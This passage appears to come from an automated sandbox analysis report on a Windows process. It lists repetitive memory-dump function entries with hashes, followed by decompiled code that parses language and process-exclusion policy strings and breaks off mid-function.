                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00961930, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095F938, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FAB8, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FA20, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FA50, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FBE8, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                                                • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                                                • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FB50, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                                                • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                                                • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FC30, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00960C40, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FC48, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00961D80, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FD5C, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FE24, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FFFC, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0095FF34, Relevance: .0, Instructions: 6COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.462096989.0000000000950000.00000040.00000001.sdmp, Offset: 00940000, based on PE: true
                                                • Associated: 00000005.00000002.462086313.0000000000940000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462196280.0000000000A30000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462209254.0000000000A40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462218698.0000000000A44000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462224641.0000000000A47000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462233009.0000000000A50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.462274748.0000000000AB0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00988788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E00988788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00988460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0096E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0098718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00988460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0098718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00988460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00988460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00988460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0098718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0096E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00962340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0097E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0096E2A8(_t322,  &_v68, _v16);
								if(E00985553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0097E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0096E2A8(_t322,  &_v68, _t236);
								if(E00985553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0098718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0096E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00962340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0097E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0096E2A8(_v12,  &_v68, _v16);
							if(E00985553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0097E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0096E2A8(_t322,  &_v68, _t269);
							if(E00985553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0096E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0098718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0096E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00962340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0097E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0096E2A8(_v12,  &_v68, _v16);
						if(E00985553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0097E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0096E2A8(_t322,  &_v68, _t296);
						if(E00985553(_t328,  &_v68,  &_v36) != 0) {
